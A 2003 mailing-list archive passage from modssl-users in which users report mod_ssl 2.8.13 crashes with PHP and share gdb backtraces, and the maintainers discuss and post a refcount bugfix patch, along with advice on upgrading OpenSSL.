Date: Thu, 20 Mar 2003 23:06:50 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philipp Roos" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!
I am activate in one of the virtual hosts the SSLEngine. (SSLEngine on)
then I start the apache
and get a: /usr/sbin/apachectl start: httpd could not be started
in the apache error log is just a: [notice] SIGHUP received.  Attempting to
restart
then there is no apache in the ps -aux list.

I have:
Server version: Apache/1.3.26 (Unix) Debian GNU/Linux
Server built:   Oct 26 2002 09:15:15

OpenSSL 0.9.6g 9 Aug 2002

the libapache-mod-ssl from debain
i don't know the version. i installed it with apt-get.

Some idear's?
thx for ever hint!

greetings Philipp

PS: if i don't activate the SSLEngine the server is running normaly

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 09:42:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 916962AA02C; Fri, 21 Mar 2003 09:42:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 7D9B82AA01A
	for ; Fri, 21 Mar 2003 09:42:28 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.8/8.12.6) with ESMTP id h2L8gO4Z019623
	for ; Fri, 21 Mar 2003 09:42:24 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h2L8g4c3013093
	for ; Fri, 21 Mar 2003 09:42:23 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: mod_ssl/2.8.13 and php AND Problem with 2.8.13 and Solaris 2.6
Date: Fri, 21 Mar 2003 09:42:08 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod_ssl/2.8.13 and php
Importance: normal
Thread-Index: AcLu1MYKVJ3uFWY7TWaNC5h5fOsZ+QAsE1Hw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Can we bring these threads together? It would seem we have:

>Burkhard:
>Apache/1.3.27 mod_gzip/1.3.26.1a PHP/4.3.1 mod_ssl/2.8.13 
>OpenSSL/0.9.7a

	QUESTION: What OS?

And:

>Jazz:
>mod_ssl 2.8.13, OpenSSL 0.9.6i with apache 1.3.27 
>... on Solaris 2.6/Sparc

	QUESTION: using PHP?

Both have the same problem, HTTP is OK but HTTPS causes segfault.

Any other users experiencing this?

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 12:31:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3DF322AA02C; Fri, 21 Mar 2003 12:31:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP id 2BDC02AA01A
	for ; Fri, 21 Mar 2003 12:31:40 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 106944CE566; Fri, 21 Mar 2003 12:31:40 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 991BE286CA; Fri, 21 Mar 2003 12:30:36 +0100 (CET)
Date: Fri, 21 Mar 2003 12:30:36 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: mod_ssl/2.8.13 and php
Message-ID: <20030321113036.GA62406@engelschall.com>
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com> <3E7A1682.5050301@pydo.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3E7A1682.5050301@pydo.org>
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Mar 20, 2003, Artur Pydo wrote:

> I can see the same segmentation fault :
>
> FreeBSD 4.8-STABLE
> Apache 1.3.27
> Openssl 0.9.7a
> Modssl 2.8.13
> PHP 4.3.1 / PHP 4.3.2RC1 / PHP 4.3.2-snapshot
>
> It happens both with static compilation and as DSO.
>
> The backtrace seems pointing out an error in
> ssl_var_lookup_ssl_cert().
>
> This problem only appears with PHP compiled in and
> asking for a .php document. I mean asking for a html
> document works fine.
>
> Backtrace (sorry for the formatting) :
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x283a6e9a in ssl_var_lookup_ssl_cert () from
> /usr/local/apache/libexec/libssl.so
> (gdb) bt
> #0  0x283a6e9a in ssl_var_lookup_ssl_cert () from
> /usr/local/apache/libexec/libssl.so
> #1  0x283a6d49 in ssl_var_lookup_ssl () from
> /usr/local/apache/libexec/libssl.so
> #2  0x283a6291 in ssl_var_lookup () from /usr/local/apache/libexec/libssl.so
> #3  0x283a11c8 in ssl_hook_Fixup () from /usr/local/apache/libexec/libssl.so
> #4  0x805472b in run_method (r=0x815d034, offset=29, run_all=1) at
> http_config.c:370
> #5  0x805480a in ap_run_fixups (r=0x815d034) at http_config.c:397
> #6  0x806a7cc in process_request_internal (r=0x815d034) at
> http_request.c:1303
> #7  0x806a866 in ap_process_request (r=0x815d034) at http_request.c:1324
> #8  0x80610eb in child_main (child_num_arg=0) at http_main.c:4689
> #9  0x80612cd in make_child (s=0x80b0034, slot=0, now=1048177481) at
> http_main.c:4813
> #10 0x8061446 in startup_children (number_to_start=5) at http_main.c:4895
> #11 0x8061a74 in standalone_main (argc=5, argv=0xbfbffb04) at
> http_main.c:5203
> #12 0x80622f0 in main (argc=5, argv=0xbfbffb04) at http_main.c:5566
> #13 0x804f4b1 in _start ()

Hmmm... I've in-depth looked at the changes to ssl_engine_vars.c
and they all look correct:

Index: ssl_engine_vars.c
===================================================================
RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_vars.c,v
retrieving revision 1.51
retrieving revision 1.53
diff -u -d -u -3 -r1.51 -r1.53
--- ssl_engine_vars.c	29 Jun 2002 07:42:51 -0000	1.51
+++ ssl_engine_vars.c	29 Oct 2002 13:00:46 -0000	1.53
@@ -314,12 +314,16 @@
         result = ssl_var_lookup_ssl_cert_verify(p, c);
     }
     else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "CLIENT_", 7)) {
-        if ((xs = SSL_get_peer_certificate(ssl)) != NULL)
+        if ((xs = SSL_get_peer_certificate(ssl)) != NULL) {
             result = ssl_var_lookup_ssl_cert(p, xs, var+7);
+            X509_free(xs);
+        }
     }
     else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "SERVER_", 7)) {
-        if ((xs = SSL_get_certificate(ssl)) != NULL)
+        if ((xs = SSL_get_certificate(ssl)) != NULL) {
             result = ssl_var_lookup_ssl_cert(p, xs, var+7);
+            X509_free(xs);
+        }
     }
     return result;
 }
@@ -352,7 +356,7 @@
         xsname = X509_get_subject_name(xs);
         cp = X509_NAME_oneline(xsname, NULL, 0);
         result = ap_pstrdup(p, cp);
-        free(cp);
+        OPENSSL_free(cp);
         resdup = FALSE;
     }
     else if (strlen(var) > 5 && strcEQn(var, "S_DN_", 5)) {
@@ -364,7 +368,7 @@
         xsname = X509_get_issuer_name(xs);
         cp = X509_NAME_oneline(xsname, NULL, 0);
         result = ap_pstrdup(p, cp);
-        free(cp);
+        OPENSSL_free(cp);
         resdup = FALSE;
     }
     else if (strlen(var) > 5 && strcEQn(var, "I_DN_", 5)) {
@@ -543,6 +547,10 @@
     else
         /* client verification failed */
         result = ap_psprintf(p, "FAILED:%s", verr);
+
+    if (xs != NULL)
+        X509_free(xs);
+
     return result;
 }


Additionally, I still cannot reproduce the problem myself. So, can you
help me here by using a breakpoint at ssl_var_lookup_ssl_cert() and the
single-stepping until the problem occurs? This would help us in really
locating the problem.
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 12:37:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EC3ED2AA02C; Fri, 21 Mar 2003 12:37:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lacrosse.corp.redhat.com (nat-pool-rdu.redhat.com [66.187.233.200])
	by master.modssl.org (Postfix) with ESMTP id DDF932AA01A
	for ; Fri, 21 Mar 2003 12:37:18 +0100 (CET)
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by lacrosse.corp.redhat.com (8.11.6/8.9.3) with ESMTP id h2LBbCo14955
	for ; Fri, 21 Mar 2003 06:37:12 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.8/8.12.7) with ESMTP id h2LBbBvY030223
	for ; Fri, 21 Mar 2003 11:37:11 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.8/8.12.8/Submit) id h2LBbAVt030222
	for modssl-users@modssl.org; Fri, 21 Mar 2003 11:37:10 GMT
Date: Fri, 21 Mar 2003 11:37:10 +0000
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: mod_ssl/2.8.13 and php
Message-ID: <20030321113710.GC20482@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com> <3E7A1682.5050301@pydo.org> <20030321113036.GA62406@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030321113036.GA62406@engelschall.com>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Mar 21, 2003 at 12:30:36PM +0100, Ralf S. Engelschall wrote:
> -        if ((xs = SSL_get_certificate(ssl)) != NULL)
> +        if ((xs = SSL_get_certificate(ssl)) != NULL) {
>              result = ssl_var_lookup_ssl_cert(p, xs, var+7);
> +            X509_free(xs);
> +        }
>      }

That isn't safe, SSL_get_certificate doesn't increase the refcount on
the certificate (unlike SSL_peer_get_certificate).

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 13:32:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E1FEC2AA02C; Fri, 21 Mar 2003 13:32:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bastion.pydo.net (bastion.pydo.net [62.212.97.116])
	by master.modssl.org (Postfix) with ESMTP id 408982AA01A
	for ; Fri, 21 Mar 2003 13:32:57 +0100 (CET)
Received: by bastion.pydo.net (Postfix, from userid 10025)
	id 0F7404C258; Fri, 21 Mar 2003 13:32:53 +0100 (CET)
Received: from pydo.org (univers2.pydo.org [192.168.0.4])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by bastion.pydo.net (Postfix) with ESMTP id 2C60D4C250
	for ; Fri, 21 Mar 2003 13:32:47 +0100 (CET)
Message-ID: <3E7B067E.3070806@pydo.org>
Date: Fri, 21 Mar 2003 13:33:02 +0100
From: Artur Pydo 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: fr-fr, fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl/2.8.13 and php
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com> <3E7A1682.5050301@pydo.org> <20030321113036.GA62406@engelschall.com>
In-Reply-To: <20030321113036.GA62406@engelschall.com>
X-Enigmail-Version: 0.71.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Spam-Status: No, hits=-23.0 required=5.0
	tests=AWL,EMAIL_ATTRIBUTION,IN_REP_TO,QUOTED_EMAIL_TEXT,
	      REFERENCES,REPLY_WITH_QUOTES,USER_AGENT_MOZILLA_UA
	autolearn=ham	version=2.50
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Artur Pydo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Ralf S. Engelschall wrote:

> Additionally, I still cannot reproduce the problem myself. So, can you
> help me here by using a breakpoint at ssl_var_lookup_ssl_cert() and the
> single-stepping until the problem occurs? This would help us in really
> locating the problem.

I recompiled static Apache binary with -g3.
First backtrace :

(gdb) run -X -f /usr/local/apache/conf/httpd.conf.static -DSSL
Starting program: /usr/local/src/build/test/apache_1.3.27/src/./httpd -X 
-f /usr/local/apache/conf/httpd.conf.static -DSSL

Program received signal SIGSEGV, Segmentation fault.
0x80a0b76 in ssl_var_lookup_ssl_cert (p=0x82a500c, xs=0x833d280, 
var=0x8214035 "V_END") at ssl_engine_vars.c:353
353             result = ssl_var_lookup_ssl_cert_valid(p, 
X509_get_notAfter(xs));
(gdb) bt
#0  0x80a0b76 in ssl_var_lookup_ssl_cert (p=0x82a500c, xs=0x833d280, 
var=0x8214035 "V_END") at ssl_engine_vars.c:353
#1  0x80a0a4d in ssl_var_lookup_ssl (p=0x82a500c, c=0x8352014, 
var=0x821402e "SERVER_V_END") at ssl_engine_vars.c:324
#2  0x80a0049 in ssl_var_lookup (p=0x82a500c, s=0x82e567c, c=0x8352014, 
r=0x82a5034, var=0x821402a "SSL_SERVER_V_END")
     at ssl_engine_vars.c:191
#3  0x809b74b in ssl_hook_Fixup (r=0x82a5034) at ssl_engine_kernel.c:1336
#4  0x8162d3f in run_method (r=0x82a5034, offset=19, run_all=1) at 
http_config.c:370
#5  0x8162e1e in ap_run_fixups (r=0x82a5034) at http_config.c:397
#6  0x8177e7e in ap_sub_req_method_uri (method=0x824fa8a "GET", 
new_file=0x82ee754 "index.php", r=0x833e034) at http_request.c:855
#7  0x8177ebf in ap_sub_req_lookup_uri (new_file=0x82ee754 "index.php", 
r=0x833e034) at http_request.c:880
#8  0x808e3bc in handle_dir (r=0x833e034) at mod_dir.c:163
#9  0x81631f1 in ap_invoke_handler (r=0x833e034) at http_config.c:518
#10 0x8178e10 in process_request_internal (r=0x833e034) at 
http_request.c:1308
#11 0x8178e7a in ap_process_request (r=0x833e034) at http_request.c:1324
#12 0x816f6ff in child_main (child_num_arg=0) at http_main.c:4689
#13 0x816f8e1 in make_child (s=0x829f034, slot=0, now=1048249519) at 
http_main.c:4813
#14 0x816fa5a in startup_children (number_to_start=5) at http_main.c:4895
#15 0x8170088 in standalone_main (argc=5, argv=0xbfbffaf4) at 
http_main.c:5203
#16 0x8170904 in main (argc=5, argv=0xbfbffaf4) at http_main.c:5566
#17 0x807d109 in _start ()

I'm going on to see if i can bring you more specific trace.
Your suggestions are welcome i am backtracing for the first time. :)

-- 

Best regards,

Artur Pydo.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 13:33:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C12B2AA02C; Fri, 21 Mar 2003 13:33:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 5BD282AA01A
	for ; Fri, 21 Mar 2003 13:33:39 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h2LCfkx03297;
	Fri, 21 Mar 2003 12:42:07 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 21 Mar 2003 12:32:47 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F27E0@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Cc: Robert.Lagana@entrust.com
Subject: RE: openssl upgrade
Date: Fri, 21 Mar 2003 12:32:47 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It really depends what you want.

1. You can stick with the Red Hat supplied packages to keep your machine up
to date. Registration with RHN is free (https://rhn.redhat.com), although
the demo accounts do get locked out under heavy. I recommend buying at least
one registration to get priority access. You'll need to run rhn_register on
each machine.

2. If you want the latest features (including patent restricted cyphers) you
can install openssl 0.9.7a alongside the openssl package (don't remove it).
Just don't overwrite /usr/bin/openssl. I haven't tried this with the latest
versions, but it worked fine with one of the betas.

I could make up some RPMs for the latest openssl version, but I've not had
any demand (or much time. I've spent most of the last three weeks trying to
rebuild an evil windoze server).

See the openssl FAQ for some more details.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

A world of difference - in the UK, 37 million people put their faith on the
last census as "Christian". In Saudi Arabia, this answer would carry a death
sentence for any Saudi.


> -----Original Message-----
> From: Robert Lagana [mailto:Robert.Lagana@entrust.com]
> Sent: 20 March 2003 16:34
> To: 'modssl-users@modssl.org'
> Subject: openssl upgrade
> 
> 
> 
> On a linux 7.2 system, would it be easy to upgrade the 
> current version of
> OpenSSL to the most recent?
> Are there any directions for this?
> 
> Thanks
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 13:40:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D28892AA02C; Fri, 21 Mar 2003 13:40:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web40304.mail.yahoo.com (web40304.mail.yahoo.com [66.218.78.83])
	by master.modssl.org (Postfix) with SMTP id 224F92AA01A
	for ; Fri, 21 Mar 2003 13:40:56 +0100 (CET)
Message-ID: <20030321124051.19486.qmail@web40304.mail.yahoo.com>
Received: from [200.188.168.56] by web40304.mail.yahoo.com via HTTP; Fri, 21 Mar 2003 09:40:51 ART
Date: Fri, 21 Mar 2003 09:40:51 -0300 (ART)
From: =?iso-8859-1?q?Jazz?= 
Subject: RE: mod_ssl/2.8.13 and php AND Problem with 2.8.13 and Solaris 2.6
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Jazz?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

      Dear Mr. Owen,

      Yes, Solaris 2.6/Sparc + Php 4.2.3 + OpenSSL
0.9.6i + Mod_ssl 2.8.13 do crash. Seems that is
something with Php I think... but the error logged is
different from other reports I've saw in the list.
error_log reports:

[notice] child pid 19396 exit signal Bus Error (10)

      No problem starting the server, but all child
requests makes them crash.

      If you need more information, please ask me for.

      Jazz
    
 --- Boyle Owen  escreveu: > Can
we bring these threads together? It would seem
> we have:
> 
> >Burkhard:
> >Apache/1.3.27 mod_gzip/1.3.26.1a PHP/4.3.1
> mod_ssl/2.8.13 
> >OpenSSL/0.9.7a
> 
> 	QUESTION: What OS?
> 
> And:
> 
> >Jazz:
> >mod_ssl 2.8.13, OpenSSL 0.9.6i with apache 1.3.27 
> >... on Solaris 2.6/Sparc
> 
> 	QUESTION: using PHP?
> 
> Both have the same problem, HTTP is OK but HTTPS
> causes segfault.
> 
> Any other users experiencing this?
> 
> Rgds,
> Owen Boyle
> Disclaimer: Any disclaimer attached to this message
> may be ignored.
> 
> This message is for the named person's use only. It
> may contain
> confidential, proprietary or legally privileged
> information. No
> confidentiality or privilege is waived or lost by
> any mistransmission.
> If you receive this message in error, please notify
> the sender urgently
> and then immediately delete the message and any
> copies of it from your
> system. Please also immediately destroy any
> hardcopies of the message.
> You must not, directly or indirectly, use, disclose,
> distribute, print,
> or copy any part of this message if you are not the
> intended recipient.
> The sender's company reserves the right to monitor
> all e-mail
> communications through their networks. Any views
> expressed in this
> message are those of the individual sender, except
> where the message
> states otherwise and the sender is authorised to
> state them to be the
> views of the sender's company. 
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org 

_______________________________________________________________________
Busca Yahoo!
O serviço de busca mais completo da Internet. O que você pensar o Yahoo! encontra.
http://br.busca.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 13:47:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2DC282AA04B; Fri, 21 Mar 2003 13:47:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP id 9B2922AA02B
	for ; Fri, 21 Mar 2003 13:47:44 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7F2D24CE530; Fri, 21 Mar 2003 13:47:44 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 385E8286CA; Fri, 21 Mar 2003 13:47:24 +0100 (CET)
Date: Fri, 21 Mar 2003 13:47:24 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: [PATCH] Segfaults in 2.8.13 (was: Re: mod_ssl/2.8.13 and php)
Message-ID: <20030321124724.GB71749@engelschall.com>
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com> <3E7A1682.5050301@pydo.org> <20030321113036.GA62406@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030321113036.GA62406@engelschall.com>
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Mar 21, 2003, Ralf S. Engelschall wrote:

> > I can see the same segmentation fault :
> [...]

Ok, can the people who are able to reproduce the segfault problem,
please apply the following patch, retry it and give feedback? I think
these two bugfixes should fix the problem now. If yes, I'll release
mod_ssl 2.8.14 with it. Thanks for your help.

Index: ssl_engine_kernel.c
===================================================================
RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_kernel.c,v
retrieving revision 1.136
diff -u -d -r1.136 ssl_engine_kernel.c
--- ssl_engine_kernel.c	19 Nov 2002 13:57:01 -0000	1.136
+++ ssl_engine_kernel.c	21 Mar 2003 12:39:47 -0000
@@ -1048,13 +1048,15 @@
                         "Re-negotiation handshake failed: Client verification failed");
                 return FORBIDDEN;
             }
+            cert = SSL_get_peer_certificate(ssl);
             if (   dc->nVerifyClient == SSL_CVERIFY_REQUIRE
-                && (cert = SSL_get_peer_certificate(ssl)) == NULL) {
+                && cert == NULL) {
                 ssl_log(r->server, SSL_LOG_ERROR,
                         "Re-negotiation handshake failed: Client certificate missing");
-                X509_free(cert);
                 return FORBIDDEN;
             }
+            if (cert != NULL)
+                X509_free(cert);
         }
     }

Index: ssl_engine_vars.c
===================================================================
RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_vars.c,v
retrieving revision 1.53
diff -u -d -r1.53 ssl_engine_vars.c
--- ssl_engine_vars.c	29 Oct 2002 13:00:46 -0000	1.53
+++ ssl_engine_vars.c	21 Mar 2003 12:40:12 -0000
@@ -322,7 +322,9 @@
     else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "SERVER_", 7)) {
         if ((xs = SSL_get_certificate(ssl)) != NULL) {
             result = ssl_var_lookup_ssl_cert(p, xs, var+7);
-            X509_free(xs);
+            /* SSL_get_certificate() as of OpenSSL 0.9.7a does not increment
+               the reference count the same way SSL_get_peer_certificate does,
+               so no need to X509_free(xs) the stuff here. */
         }
     }
     return result;

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 13:47:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4E46D2AA051; Fri, 21 Mar 2003 13:47:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP id ADAC22AA02C
	for ; Fri, 21 Mar 2003 13:47:44 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8F8F84CE577; Fri, 21 Mar 2003 13:47:44 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
